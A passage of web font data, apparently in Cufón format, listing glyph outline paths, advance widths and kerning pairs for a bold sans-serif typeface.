"n":-1,"p":-1,"r":-1,"t":-5,"u":-2,"v":-4,"w":-4,"y":-4,"x":4,"z":1,"-":-4,")":7,"]":7,"}":7,",":14,".":14}},{"d":"22,71r-1,-247r47,0r3,24v42,-55,132,-25,132,62v0,86,-81,119,-126,74r0,87r-55,0xm148,-88v0,-56,-67,-66,-71,-12v-2,33,4,62,33,62v24,0,38,-20,38,-50","w":215,"k":{"T":18,"g":-1,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":9,"z":3,"-":-6,")":3,"]":3,"}":3,"\"":7,"'":7,",":12,".":12}},{"d":"91,-180v104,-2,69,97,80,180r-49,0v-2,-6,-1,-14,-4,-18v-28,40,-108,20,-108,-32v0,-46,42,-67,104,-67v4,-37,-62,-26,-81,-12r-10,-36v12,-7,36,-15,68,-15xm64,-55v0,35,52,19,52,-9r0,-19v-29,0,-52,7,-52,28","w":190},{"d":"145,3v-83,1,-128,-44,-132,-121v-6,-107,115,-149,206,-116r-12,45v-53,-25,-137,-9,-137,68v0,60,47,89,104,76r0,-51r-38,0r0,-43r90,0r0,128v-17,6,-49,14,-81,14","w":245,"k":{"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"u":-1,"v":3,"w":3,"y":3,"a":-3}},{"d":"215,0r-63,0r-45,-87v-10,27,-27,59,-39,87r-62,0r70,-123r-68,-120r63,0r41,85v11,-31,24,-57,37,-85r62,0r-68,119","w":220,"k":{"T":-2,"J":-4,"C":14,"G":14,"O":14,"Q":14,"V":-3,"W":-3,"X":4,"Y":-4,"A":5,"i":1,"m":1,"n":1,"p":1,"r":1,"c":7,"d":7,"e":7,"o":7,"q":7,"u":4,"v":13,"w":13,"y":13,"a":3,"-":6,"\"":-1,"'":-1}},{"d":"98,40r-74,0r0,-287r74,0r0,30r-34,0r0,227r34,0r0,30","w":113,"k":{"T":-8,"J":-4,"C":8,"G":8,"O":8,"Q":8,"V":-10,"W":-10,"X":-2,"Y":-11,"A":7,"j":-18}},{"d":"98,4v-99,0,-110,-95,-45,-125v-66,-33,-27,-121,49,-117v88,4,98,79,43,113v75,28,43,129,-47,129xm100,-34v19,0,32,-12,32,-29v0,-21,-15,-33,-36,-39v-38,7,-39,67,4,68xm99,-201v-19,0,-28,13,-28,27v0,16,14,26,33,32v30,-6,35,-59,-5,-59"},{"d":"121,-1v-47,14,-91,-3,-91,-63r0,-72r-24,0r0,-40r24,0r0,-33r53,-15r0,48r39,0r0,40r-39,0v4,39,-17,108,38,94r0,41","w":132,"k":{"g":2,"c":2,"d":2,"e":2,"o":2,"q":2,"v":-2,"w":-2,"y":-2,",":3,".":3}},{"w":72,"k":{"T":14,"V":13,"W":13,"Y":14}},{"d":"71,0r0,-197r-66,0r0,-46r187,0r0,46r-66,0r0,197r-55,0","w":197,"k":{"i":19,"T":-8,"J":19,"C":10,"G":10,"O":10,"Q":10,"V":-10,"W":-10,"X":-6,"Y":-3,"A":26,"M":1,"S":3,"g":22,"b":4,"h":4,"k":4,"l":4,"m":19,"n":19,"p":19,"r":19,"c":29,"d":29,"e":29,"o":29,"q":29,"s":26,"u":19,"v":19,"w":19,"y":19,"x":5,"a":24,"z":21,":":13,";":13,"-":22,")":-11,"]":-11,"}":-11,"\"":-3,"'":-3,",":30,".":30}},{"d":"150,-62r-70,0r-17,62r-57,0r74,-243r72,0r76,243r-60,0xm88,-103r54,0r-28,-99","w":236,"k":{"T":30,"J":-5,"C":9,"G":9,"O":9,"Q":9,"U":13,"V":21,"W":21,"X":9,"Y":34,"Z":-2,"f":5,"g":5,"b":2,"h":2,"k":2,"l":2,"j":2,"i":2,"m":2,"n":2,"p":2,"r":2,"c":5,"d":5,"e":5,"o":5,"q":5,"s":1,"t":7,"u":5,"v":11,"w":11,"y":11,"x":1,"-":3,")":6,"]":6,"}":6,"\"":17,"'":17}},{"d":"21,-80r0,-31r173,-81r0,39r-131,58r131,57r0,38","w":214},{"d":"9,0r0,-30r115,-167r-105,0r0,-46r176,0r0,32r-113,166r115,0r0,45r-188,0","w":207,"k":{"J":-8,"C":8,"G":8,"O":8,"Q":8,"X":2,"Y":-2,"A":-3,"c":3,"d":3,"e":3,"o":3,"q":3,"u":4,"v":6,"w":6,"y":6,"a":-1,"-":3}},{"d":"106,-136v-50,0,-22,88,-29,136r-55,0r0,-256r55,0r0,101v34,-44,112,-30,112,52r0,103r-55,0r0,-97v0,-23,-7,-39,-28,-39","w":210,"k":{"T":21,"t":2,"v":7,"w":7,"y":7,"\"":5,"'":5}},{"d":"123,0r-60,0r-58,-243r59,0r34,185r36,-185r58,0r33,184r34,-184r56,0r-63,243r-59,0r-21,-104v-6,-23,-6,-50,-12,-75v-9,64,-25,119,-37,179","w":319,"k":{"T":-8,"J":14,"C":3,"G":3,"O":3,"Q":3,"V":-2,"W":-2,"A":19,"S":3,"g":3,"b":3,"h":3,"k":3,"l":3,"i":10,"m":10,"n":10,"p":10,"r":10,"c":15,"d":15,"e":15,"o":15,"q":15,"s":14,"t":3,"u":11,"v":5,"w":5,"y":5,"a":15,":":8,";":8,"-":9,")":-10,"]":-10,"}":-10,"\"":-5,"'":-5,",":25,".":25}},{"d":"14,-12r12,-45v21,16,99,29,99,-11v0,-15,-12,-24,-41,-34v-40,-14,-67,-37,-67,-72v0,-41,35,-72,92,-72v28,0,48,5,62,12r-12,44v-13,-13,-86,-20,-86,12v0,15,12,24,45,34v96,30,81,150,-35,148v-28,0,-55,-8,-69,-16","w":194,"k":{"b":1,"h":1,"k":1,"l":1,"j":3,"c":-3,"d":-3,"e":-3,"o":-3,"q":-3,"t":2,"v":5,"w":5,"y":5,"a":-3,"-":-4}},{"d":"21,0r1,-256r55,0r0,101v40,-51,126,-19,126,64v0,63,-40,95,-80,95v-22,1,-40,-9,-54,-28r-2,24r-46,0xm148,-89v0,-54,-68,-68,-71,-12v-2,34,4,61,33,62v23,0,38,-18,38,-50","w":215,"k":{"T":18,"g":-1,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":9,"z":3,"-":-6,")":3,"]":3,"}":3,"\"":7,"'":7,",":12,".":12}},{"d":"233,0r-7,-193r-57,189r-43,0r-26,-94v-8,-29,-16,-63,-22,-95r-9,193r-51,0r16,-243r73,0r24,81v10,27,12,63,22,87v13,-58,31,-114,48,-168r72,0r13,243r-53,0","w":304,"k":{"T":5,"A":1,"j":-1,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"a":-1,"-":-1}},{"d":"79,-198v2,34,-25,77,23,81r0,27v-47,5,-21,47,-23,81v-2,40,-28,51,-67,49r0,-30v62,5,-8,-109,55,-114v-37,-2,-30,-51,-27,-87v2,-18,-8,-27,-28,-25r0,-31v40,-2,65,11,67,49","w":113},{"d":"135,0r-55,0r0,-99r-77,-144r63,0r44,105r43,-105r62,0r-80,142r0,101","w":217,"k":{"J":25,"C":17,"G":17,"O":17,"Q":17,"V":-7,"W":-7,"X":8,"Y":9,"A":33,"M":8,"S":10,"B":6,"D":6,"E":6,"F":6,"H":6,"I":6,"K":6,"L":6,"N":6,"P":6,"R":6,"g":29,"b":5,"h":5,"k":5,"l":5,"i":8,"m":8,"n":8,"p":8,"r":8,"c":39,"d":39,"e":39,"o":39,"q":39,"s":23,"t":16,"u":26,"v":19,"w":19,"y":19,"x":20,"a":33,"z":18,":":18,";":18,"-":22,")":-12,"]":-12,"}":-12,"\"":-3,"'":-3,",":42,".":42}},{"d":"3,-176r61,0v11,18,20,39,32,56r29,-56r60,0r-58,84r58,92r-62,0v-11,-19,-19,-41,-32,-58r-30,58r-60,0r60,-90","w":186,"k":{"T":10,"c":8,"d":8,"e":8,"o":8,"q":8,"s":3,"t":-5,"v":-7,"w":-7,"y":-7,"-":1}},{"d":"37,40r-37,3v12,-32,22,-69,27,-102r55,-4v-12,37,-28,75,-45,103","w":93,"k":{"\"":44,"'":44}},{"d":"181,0r-166,0r0,-33v38,-35,115,-99,107,-127v4,-44,-69,-38,-88,-15r-16,-39v17,-13,46,-24,77,-24v53,0,82,31,82,73v0,49,-50,88,-84,120r88,0r0,45"},{"d":"11,-113r94,0r0,37r-94,0r0,-37","w":115,"k":{"T":20,"J":2,"C":-4,"G":-4,"O":-4,"Q":-4,"V":9,"W":9,"X":6,"Y":22,"A":2,"g":-1,"c":-6,"d":-6,"e":-6,"o":-6,"q":-6}},{"d":"97,-244v61,-1,99,17,101,70v1,32,-24,50,-43,60v35,8,40,92,52,114r-56,0v-4,-7,-10,-27,-17,-57v-8,-38,-21,-39,-56,-38r0,95r-54,0r0,-239v18,-3,43,-5,73,-5xm78,-202r0,67v35,3,65,-6,65,-35v0,-31,-37,-36,-65,-32","w":213,"k":{"J":-2,"C":1,"G":1,"O":1,"Q":1,"U":2,"V":2,"W":2,"X":-3,"Y":7,"A":-3,"b":-3,"h":-3,"k":-3,"l":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"t":-4,"v":-1,"w":-1,"y":-1,"a":-3}},{"d":"32,-270r38,0r0,360r-38,0r0,-360","w":101},{"d":"-14,35v38,-6,43,-14,43,-69r0,-142r55,0v-7,107,36,260,-93,253xm57,-252v18,0,28,12,28,27v0,15,-11,27,-29,27v-17,0,-29,-12,-29,-27v0,-15,12,-27,30,-27","w":104,"k":{",":4,".":4}},{"d":"3,-176r60,0v13,40,19,88,35,125v7,-43,21,-84,32,-125r58,0r-66,176r-55,0","w":190,"k":{"T":13,"g":5,"c":5,"d":5,"e":5,"o":5,"q":5,"s":6,"v":-7,"w":-7,"y":-7,"a":3,":":-2,";":-2,"-":3,",":17,".":17}},{"d":"12,-86v0,-88,86,-122,128,-69r1,-21r53,0r-1,247r-55,0r-1,-93v-41,54,-125,19,-125,-64xm67,-88v0,56,68,66,71,12v2,-33,-3,-61,-33,-62v-25,0,-38,22,-38,50","w":214,"k":{"T":13,",":3,".":3}},{"d":"1,-253r51,0r31,55r-38,0","w":108},{"d":"85,0r-1,-185r-44,21r-9,-41r62,-29r45,0r0,234r-53,0"},{"d":"50,4v-18,0,-32,-14,-32,-33v0,-20,13,-34,32,-34v19,0,32,14,32,34v0,19,-12,33,-32,33","w":93,"k":{"\"":44,"'":44}},{"d":"130,-128v-31,-5,-53,8,-53,39r0,89r-55,0r-1,-176r46,0v2,10,-2,26,4,32v13,-30,32,-39,59,-35r0,51","w":136,"k":{"T":7,"f":-10,"g":3,"b":1,"h":1,"k":1,"l":1,"c":3,"d":3,"e":3,"o":3,"q":3,"t":-8,"u":1,"v":-6,"w":-6,"y":-6,"x":-5,"a":4,"z":-3,":":1,";":1,",":23,".":23}},{"w":72,"k":{"T":14,"V":13,"W":13,"Y":14}},{"d":"113,14r-36,0r-73,-261r37,0","w":118},{"d":"189,-26v11,91,-86,123,-162,88r11,-42v32,22,111,20,96,-44v-41,51,-122,10,-122,-63v0,-81,87,-122,129,-68r2,-21r47,0xm67,-89v0,52,67,65,67,11v0,-32,-3,-61,-31,-61v-20,0,-36,18,-36,50","w":210,"k":{"T":12,",":6,".":6}},{"d":"34,-9v-2,-34,25,-76,-23,-81r0,-27v47,-4,21,-47,23,-81v2,-39,28,-52,68,-49r0,31v-63,-6,7,108,-56,113v37,2,31,51,27,87v-2,19,8,28,29,26r0,30v-40,2,-66,-8,-68,-49","w":113,"k":{"T":-8,"J":-4,"C":8,"G":8,"O":8,"Q":8,"V":-10,"W":-10,"X":-2,"Y":-11,"A":7,"j":-18}},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"22,0r0,-256r55,0r0,256r-55,0","w":99,"k":{",":3,".":3}},{"d":"177,-190v0,25,-18,45,-48,64v14,16,29,33,41,45v10,-15,17,-37,20,-59r49,0v-6,37,-18,68,-40,92r43,48r-64,0v-5,-5,-10,-11,-16,-17v-16,12,-37,21,-66,21v-105,0,-105,-107,-39,-140v-35,-42,-17,-111,55,-111v37,0,65,22,65,57xm63,-74v0,36,53,50,74,26v-15,-15,-35,-38,-55,-60v-10,8,-19,18,-19,34xm131,-189v0,-12,-7,-26,-22,-24v-30,4,-25,43,-4,60v18,-12,26,-22,26,-36","w":244},{"d":"151,-67v-25,0,-64,-30,-84,-32v-9,0,-16,7,-17,30r-35,0v0,-48,22,-67,51,-67v25,0,64,29,84,31v8,0,14,-7,15,-29r34,0v2,51,-21,67,-48,67","w":214},{"d":"28,-176v-5,-57,42,-98,100,-80r-2,42v-27,-8,-48,6,-43,38r35,0r0,40r-35,0r0,136r-55,0r0,-136r-23,0r0,-40r23,0","w":122,"k":{"g":3,"c":4,"d":4,"e":4,"o":4,"q":4,"s":2,"t":-5,":":-10,";":-10,"-":1,")":-26,"]":-26,"}":-26,"\"":-15,"'":-15,",":14,".":14}},{"d":"103,-136v-50,0,-21,88,-28,136r-53,0r-1,-176r46,0v2,7,0,18,3,24v8,-12,23,-28,53,-28v23,0,41,12,49,30v31,-48,116,-42,116,46r0,104r-53,0r0,-96v0,-26,-8,-40,-26,-40v-47,0,-20,89,-27,136r-53,0r0,-99v0,-22,-8,-37,-26,-37","w":309,"k":{"T":21,"t":2,"v":7,"w":7,"y":7,"\"":5,"'":5}},{"d":"80,-98r33,0r6,-40r-33,0xm66,0r-33,0r10,-64r-30,0r0,-34r35,0r6,-40r-30,0r0,-33r35,0r9,-63r32,0r-9,63r33,0r9,-63r32,0r-9,63r29,0r0,33r-34,0r-6,40r30,0r0,34r-35,0r-9,64r-33,0r10,-64r-33,0","w":198},{"d":"199,-64r-39,0r-53,-128r-53,128r-39,0r76,-170r33,0","w":214},{"d":"177,-71r-113,0v2,40,66,39,98,26r8,37v-68,30,-158,3,-158,-78v0,-45,28,-94,89,-94v64,0,84,54,76,109xm64,-108r65,0v0,-13,-6,-36,-31,-36v-23,0,-33,22,-34,36","w":190,"k":{"T":15,"v":2,"w":2,"y":2,"x":4,"-":-11,"\"":1,"'":1,",":6,".":6}},{"d":"20,33v22,-5,58,-22,47,-48r-65,-161r61,0r36,119r30,-119r58,0v-40,93,-59,246,-155,256","w":188,"k":{"T":13,"g":5,"c":5,"d":5,"e":5,"o":5,"q":5,"s":6,"v":-7,"w":-7,"y":-7,"a":3,":":-2,";":-2,"-":3,",":17,".":17}},{"d":"138,-256r55,0r1,256r-49,0v-2,-8,0,-20,-3,-26v-39,59,-130,24,-130,-60v0,-81,77,-119,126,-75r0,-95xm67,-88v0,58,71,64,71,10v0,-33,-3,-59,-33,-60v-25,0,-38,22,-38,50","w":214,"k":{",":3,".":3}},{"d":"12,-9r10,-39v13,9,68,24,70,-1v0,-9,-5,-14,-25,-20v-81,-23,-59,-111,21,-111v21,0,38,5,49,10r-9,38v-11,-7,-57,-20,-59,4v0,9,6,13,28,20v74,22,60,116,-28,112v-23,0,-44,-6,-57,-13","w":156,"k":{"T":13,",":4,".":4}},{"d":"148,-45r6,40v-62,26,-150,-7,-142,-81v-6,-64,69,-113,142,-87r-8,41v-32,-15,-78,0,-78,43v0,45,45,59,80,44","w":162,"k":{"T":5,"f":-3,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-6,"v":-5,"w":-5,"y":-5,"a":-1,"-":-4,"\"":-2,"'":-2,",":3,".":3}},{"d":"198,-169v2,64,-54,89,-120,82r0,87r-54,0r0,-239v17,-3,41,-5,74,-5v62,-1,98,21,100,75xm78,-201r0,72v33,6,68,-8,66,-38v4,-30,-37,-41,-66,-34","w":209,"k":{"J":27,"V":3,"W":3,"X":10,"Y":7,"Z":3,"A":22,"M":5,"g":9,"i":3,"m":3,"n":3,"p":3,"r":3,"c":9,"d":9,"e":9,"o":9,"q":9,"s":8,"t":-4,"u":4,"v":-3,"w":-3,"y":-3,"a":6,":":4,";":4,"-":5,")":1,"]":1,"}":1,",":52,".":52}},{"d":"13,-249r48,0r-8,97r-32,0","w":73,"k":{"T":-3,"J":21,"C":3,"G":3,"O":3,"Q":3,"V":-3,"W":-3,"X":-1,"Y":-3,"A":17,"f":-9,"g":7,"c":5,"d":5,"e":5,"o":5,"q":5,"t":-8,"v":-2,"w":-2,"y":-2,",":45,".":45}},{"d":"50,-112v-19,0,-32,-14,-32,-33v0,-19,13,-33,32,-33v19,0,32,13,32,33v0,19,-12,33,-32,33xm50,4v-19,0,-32,-14,-32,-33v0,-19,13,-33,32,-33v19,0,32,13,32,33v0,19,-12,33,-32,33","w":93},{"d":"103,-247r31,18r-39,47r58,-11r0,36v-19,-2,-41,-9,-58,-9r39,45r-32,18r-21,-55r-21,55r-31,-18v11,-15,30,-31,38,-46r-56,10r0,-36v18,2,40,10,56,10r-38,-45r32,-19v8,18,12,39,21,56","w":163},{"d":"231,42v-41,-10,-70,-32,-112,-38v-54,-8,-106,-44,-106,-124v0,-73,45,-127,118,-127v74,0,115,56,115,123v0,57,-28,92,-57,110v18,5,39,9,58,13xm130,-40v37,0,58,-34,58,-82v0,-45,-21,-81,-58,-81v-37,0,-59,36,-59,82v0,46,22,81,59,81","w":258,"k":{"T":10,"V":3,"W":3,"X":12,"Y":13,"A":6,"f":-4,"g":-1,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"t":-5,"u":-2,"v":-4,"w":-4,"y":-4,"x":4,"z":1,"-":-4,")":7,"]":7,"}":7,",":14,".":14}},{"d":"13,-249r48,0r-8,97r-32,0xm82,-249r48,0r-8,97r-32,0","w":142,"k":{"T":-3,"J":21,"C":3,"G":3,"O":3,"Q":3,"V":-3,"W":-3,"X":-1,"Y":-3,"A":17,"f":-9,"g":7,"c":5,"d":5,"e":5,"o":5,"q":5,"t":-8,"v":-2,"w":-2,"y":-2,",":45,".":45}},{"d":"32,-39v51,4,92,-18,99,-59v-40,37,-120,10,-120,-56v0,-46,37,-84,88,-84v109,0,107,160,48,209v-28,23,-67,35,-115,32r0,-42xm98,-120v20,0,33,-7,33,-29v0,-25,-8,-49,-34,-49v-18,0,-32,17,-32,41v0,20,11,37,33,37"},{"d":"8,0r0,-31r55,-70v10,-12,18,-21,28,-31r-77,0r0,-44r144,0r0,33r-53,67v-10,11,-19,22,-29,32r85,0r0,44r-153,0","w":168,"k":{"T":10,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-3,"w":-3,"y":-3}},{"d":"77,0r-55,0r0,-176r55,0r0,176xm50,-252v18,0,28,12,28,27v0,15,-11,27,-29,27v-17,0,-28,-12,-28,-27v0,-15,11,-27,29,-27","w":98},{"d":"69,-80r-41,0r-8,-163r57,0xm48,4v-19,0,-32,-14,-32,-33v0,-19,13,-33,32,-33v19,0,32,14,32,33v0,19,-13,33,-32,33","w":96},{"d":"24,-243r55,0r0,94r90,0r0,-94r55,0r0,243r-55,0r0,-102r-90,0r0,102r-55,0r0,-243","w":248,"k":{"Y":6,"f":-2,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":1,"d":1,"e":1,"o":1,"q":1,"s":1,"t":-3,"x":1,"z":-1}},{"d":"24,0r0,-243r148,0r0,45r-93,0r0,56r87,0r0,44r-87,0r0,98r-55,0","w":189,"k":{"J":25,"A":24,"M":5,"g":3,"b":5,"h":5,"k":5,"l":5,"i":7,"m":7,"n":7,"p":7,"r":7,"c":9,"d":9,"e":9,"o":9,"q":9,"u":10,"v":7,"w":7,"y":7,"a":14,":":6,";":6,",":32,".":32}},{"d":"63,-249r38,0v-47,59,-48,232,0,291r-38,0v-19,-28,-41,-76,-41,-145v0,-70,22,-118,41,-146","w":113,"k":{"T":-8,"J":-4,"C":8,"G":8,"O":8,"Q":8,"V":-10,"W":-10,"X":-2,"Y":-11,"A":7,"j":-18}},{"d":"117,31r-36,0r0,-34v-24,-1,-47,-7,-61,-15r11,-42v20,14,94,28,94,-7v0,-14,-10,-25,-38,-31v-80,-17,-88,-116,-4,-130r0,-34r35,0r0,31v24,1,40,6,53,12r-11,41v-8,-11,-83,-24,-83,8v0,12,12,21,44,30v83,23,77,120,-4,134r0,37"},{"d":"76,-238v40,0,62,30,62,70v0,49,-31,74,-65,74v-36,0,-63,-27,-63,-71v0,-42,26,-73,66,-73xm74,-208v-16,0,-24,18,-24,42v0,24,9,43,25,43v15,0,23,-16,23,-43v0,-24,-7,-42,-24,-42xm105,4r-29,0r135,-242r29,0xm244,-141v40,0,63,30,63,70v0,49,-31,74,-65,74v-35,0,-63,-26,-63,-70v0,-42,25,-74,65,-74xm243,-111v-16,0,-24,19,-24,42v0,24,9,42,24,42v15,0,23,-16,23,-42v0,-24,-6,-42,-23,-42","w":316},{"d":"14,-12r11,-42v19,16,100,25,97,-16v-2,-30,-35,-36,-69,-34r0,-39v29,1,60,0,63,-27v3,-34,-69,-26,-84,-11r-11,-39v14,-9,42,-18,73,-18v87,0,103,90,34,113v28,5,51,27,51,58v0,41,-37,71,-96,71v-30,0,-55,-8,-69,-16"},{"d":"165,-237r0,42v-53,-3,-98,25,-97,56v43,-38,122,-14,122,58v0,46,-36,85,-86,85v-113,0,-113,-155,-51,-207v28,-24,65,-36,112,-34xm100,-118v-20,1,-35,12,-35,34v0,25,13,48,38,48v19,0,32,-18,32,-42v0,-22,-12,-40,-35,-40"},{"d":"24,0r0,-243r54,0r1,108r71,-108r68,0r-80,104r84,139r-64,0r-59,-105r-21,26r0,79r-54,0","w":221,"k":{"T":-2,"J":-10,"C":12,"G":12,"O":12,"Q":12,"Y":5,"Z":-6,"A":-5,"g":5,"c":6,"d":6,"e":6,"o":6,"q":6,"u":7,"v":15,"w":15,"y":15,":":-3,";":-3,"-":8,")":-3,"]":-3,"}":-3,"\"":-1,"'":-1,",":-3,".":-3}},{"d":"71,-90r0,-153r55,0r0,154v2,86,-58,104,-126,87r6,-44v34,9,65,7,65,-44","w":147,"k":{"v":-1,"w":-1,"y":-1,"a":2,")":-5,"]":-5,"}":-5,",":3,".":3}},{"d":"42,14r-36,0r77,-261r36,0","w":119},{"d":"76,-153v56,-6,106,20,105,75v0,44,-38,82,-101,82v-28,0,-52,-6,-65,-13r10,-41v26,14,101,21,100,-25v8,-33,-56,-43,-98,-36r15,-123r129,0r0,45r-90,0"},{"d":"131,-247v75,0,115,56,115,123v0,80,-48,128,-119,128v-72,0,-114,-55,-114,-124v0,-73,47,-127,118,-127xm130,-203v-37,0,-59,35,-59,82v0,48,22,81,59,81v37,0,58,-35,58,-82v0,-44,-20,-81,-58,-81","w":258,"k":{"T":10,"V":3,"W":3,"X":12,"Y":13,"A":6,"f":-4,"g":-1,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"t":-5,"u":-2,"v":-4,"w":-4,"y":-4,"x":4,"z":1,"-":-4,")":7,"]":7,"}":7,",":14,".":14}},{"d":"51,42r-38,0v46,-58,47,-233,0,-291r38,0v19,28,41,75,41,146v0,70,-22,117,-41,145","w":113},{"d":"24,-243r54,0v6,70,-25,203,44,203v70,0,38,-133,45,-203r55,0r0,136v0,75,-38,111,-101,111v-61,0,-97,-34,-97,-111r0,-136","w":245,"k":{"A":11,"f":-2,"s":5,"v":2,"w":2,"y":2,"x":4,"a":2,"z":3,",":8,".":8}},{"d":"77,-256r0,154v15,-27,33,-49,49,-74r66,0r-63,71r72,105r-68,0r-43,-72r-13,17r0,55r-55,0r0,-256r55,0","w":195,"k":{"T":10,"g":5,"b":-4,"h":-4,"k":-4,"l":-4,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"c":5,"d":5,"e":5,"o":5,"q":5,"v":-1,"w":-1,"y":-1,"a":-2,":":-1,";":-1,"-":2,",":-1,".":-1}},{"d":"129,-52v24,0,33,-44,36,-72v-31,-9,-54,17,-54,49v0,14,6,23,18,23xm190,4r7,20v-82,36,-180,-3,-179,-100v0,-73,54,-137,135,-137v64,0,109,44,109,104v0,53,-30,86,-69,86v-17,0,-29,-9,-31,-28v-22,40,-87,39,-87,-19v0,-60,68,-104,127,-75r-11,67v-4,21,-1,31,9,31v15,1,35,-19,35,-61v0,-47,-30,-83,-86,-83v-55,0,-103,43,-103,112v0,81,77,113,144,83","w":277},{"d":"24,0r0,-243r55,0r0,197r96,0r0,46r-151,0","w":183,"k":{"T":37,"J":-10,"C":14,"G":14,"O":14,"Q":14,"U":11,"V":23,"W":23,"Y":32,"A":-2,"f":1,"j":1,"c":3,"d":3,"e":3,"o":3,"q":3,"t":2,"u":4,"v":13,"w":13,"y":13,"a":-1,"-":6,"\"":36,"'":36}},{"d":"90,-192r35,0r0,79r75,0r0,33r-75,0r0,80r-35,0r0,-80r-76,0r0,-33r76,0r0,-79","w":214},{"d":"74,0r-50,0r0,-243r64,0r50,89v15,25,28,58,41,83v-6,-52,-5,-113,-5,-172r51,0r0,243r-58,0r-52,-94v-15,-25,-29,-59,-43,-85","w":248,"k":{"Y":6,"f":-2,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":1,"d":1,"e":1,"o":1,"q":1,"s":1,"t":-3,"x":1,"z":-1}},{"d":"76,-81v-7,51,57,52,57,10r0,-105r55,0r1,176r-47,0v-2,-8,0,-19,-4,-25v-7,11,-23,29,-55,29v-36,0,-62,-23,-62,-77r0,-103r55,0r0,95","w":209,"k":{"T":13,",":3,".":3}},{"d":"106,-180v54,0,90,37,90,90v0,64,-46,94,-93,94v-51,0,-91,-34,-91,-91v0,-57,37,-93,94,-93xm104,-141v-26,0,-36,27,-36,53v0,30,13,53,36,53v22,0,35,-22,35,-54v0,-26,-10,-52,-35,-52","w":207,"k":{"T":18,"g":-1,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":9,"z":3,"-":-6,")":3,"]":3,"}":3,"\"":7,"'":7,",":12,".":12}},{"d":"15,-247r74,0r0,287r-74,0r0,-30r34,0r0,-227r-34,0r0,-30","w":113},{"d":"18,-234r165,0r0,35r-97,199r-58,0r97,-189r-107,0r0,-45"},{"d":"204,-71v0,60,-45,73,-121,74v-27,0,-47,-2,-59,-4r0,-238v61,-8,171,-17,171,56v0,21,-12,42,-39,52v28,7,48,29,48,60xm78,-203r0,56v32,2,65,-5,62,-29v5,-26,-36,-31,-62,-27xm78,-107r0,68v31,4,68,-1,68,-34v0,-30,-33,-36,-68,-34","w":217,"k":{"T":6,"V":4,"W":4,"Y":12,"A":1,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"v":2,"w":2,"y":2,"a":-1,"-":-4,",":5,".":5}},{"d":"168,-147r0,44r-89,0r0,58r100,0r0,45r-155,0r0,-243r150,0r0,45r-95,0r0,51r89,0","w":192,"k":{"T":-2,"J":-8,"V":-3,"W":-3,"f":2,"g":3,"b":-1,"h":-1,"k":-1,"l":-1,"j":2,"c":1,"d":1,"e":1,"o":1,"q":1,"s":-1,"t":2,"u":4,"v":4,"w":4,"y":4,"z":-2,",":3,".":3}},{"d":"101,-238v62,0,87,56,87,120v0,72,-30,122,-89,122v-60,0,-87,-55,-87,-121v0,-68,29,-121,89,-121xm100,-197v-20,0,-33,25,-33,80v0,54,12,80,33,80v21,0,33,-27,33,-80v0,-52,-11,-80,-33,-80"},{"d":"194,-112r0,33r-173,79r0,-38r133,-58r-133,-57r0,-39","w":214},{"d":"4,-176r56,0r25,130r31,-130r43,0r32,130v6,-45,16,-88,25,-130r54,0r-54,176r-51,0r-29,-117v-6,47,-18,77,-29,117r-52,0","w":273,"k":{"T":13,"g":5,"c":5,"d":5,"e":5,"o":5,"q":5,"s":6,"v":-7,"w":-7,"y":-7,"a":3,":":-2,";":-2,"-":3,",":17,".":17}},{"d":"145,0r-64,0r-78,-243r60,0r30,103v10,28,12,61,23,87v14,-66,35,-127,52,-190r59,0","w":228,"k":{"T":-8,"J":14,"C":3,"G":3,"O":3,"Q":3,"V":-2,"W":-2,"A":19,"S":3,"g":3,"b":3,"h":3,"k":3,"l":3,"i":10,"m":10,"n":10,"p":10,"r":10,"c":15,"d":15,"e":15,"o":15,"q":15,"s":14,"t":3,"u":11,"v":5,"w":5,"y":5,"a":15,":":8,";":8,"-":9,")":-10,"]":-10,"}":-10,"\"":-5,"'":-5,",":25,".":25}},{"d":"37,40r-36,3v12,-32,21,-69,26,-102r55,-4v-12,37,-28,75,-45,103xm52,-112v-19,0,-32,-14,-32,-33v0,-19,13,-33,32,-33v19,0,32,13,32,33v0,19,-12,33,-32,33","w":93},{"d":"200,-117r-186,0r0,-33r186,0r0,33xm200,-42r-186,0r0,-34r186,0r0,34","w":214},{"d":"24,-243r55,0r0,243r-55,0r0,-243","w":102,"k":{"Y":6,"f":-2,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":1,"d":1,"e":1,"o":1,"q":1,"s":1,"t":-3,"x":1,"z":-1}},{"d":"164,0r-52,0r0,-56r-104,0r0,-35r88,-143r68,0r0,137r28,0r0,41r-28,0r0,56xm59,-98v15,3,36,0,53,1r0,-95v-16,33,-34,64,-53,94"},{"d":"107,-136v-51,0,-23,87,-30,136r-55,0r-1,-176r47,0v2,7,0,18,4,24v7,-12,24,-28,54,-28v36,0,63,24,63,76r0,104r-55,0r0,-98v0,-23,-7,-38,-27,-38","w":210,"k":{"T":21,"t":2,"v":7,"w":7,"y":7,"\"":5,"'":5}},{"d":"147,-191v1,48,-54,62,-49,112r-48,0v-13,-38,38,-72,41,-103v2,-28,-45,-25,-61,-11r-13,-39v13,-8,34,-15,60,-15v48,0,70,26,70,56xm72,4v-19,0,-32,-14,-32,-33v0,-19,13,-33,32,-33v19,0,33,14,33,33v0,19,-13,33,-33,33","w":160}],f:f